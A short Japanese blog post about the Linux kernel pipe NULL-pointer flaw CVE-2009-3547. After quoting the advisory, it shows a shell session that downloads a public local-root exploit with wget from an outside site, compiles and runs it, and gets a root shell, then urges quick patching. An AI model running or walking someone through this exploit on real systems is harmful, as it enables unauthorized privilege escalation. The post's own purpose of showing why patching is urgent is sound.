代表のKotaです。
Linuxカーネルの脆弱性RHSA-2009:1548-1が出ています。
今回は折角なのでroot権を奪取してみましょう。
内容はこんな感じです
Linuxカーネルのpipe_read_open()、pipe_write_open()、およびpipe_rdwr_open()の各関数に NULLポインタデリファレンス欠陥が見つかりました。mutexロックが保持されていない場合、パイプのリーダとライタのカウンタ更新に使用される前に i_pipeポインタが他のプロセスによって解放される可能性がありました。それによってローカルのサービス拒否または権限昇格につながる可能性がありま した。(CVE-2009-3547、深刻度:重要)
exploitsコードが公開されているので権限昇格するか試してみましょう。
1 2 3 4 5 6 7 8 9 10 11 12 13 14 |
-bash-3.2$ uname -sr Linux 2.6.18-8.el5PAE -bash-3.2$ wget -q \ www.tux-planet.fr/public/hack/exploits/kernel/local-root-exploit-gayros.c -bash-3.2$ gcc local-root-exploit-gayros.c -o gayros -bash-3.2$ ./gayros We got NULL page babe! Using kernel version 2.6.18-8.el5PAE. Found version 1 structure, doing our tricks in memory... Go go go boy! We've got bush! sh-3.2# sh-3.2#id uid=0(root) gid=0(root) 所属グループ=1000(user) |
あっという間にroot権限奪取成功。。早めの対策を!!
こーゆーのをそのまま書いちゃいかん~
まあ、検証コードという事で。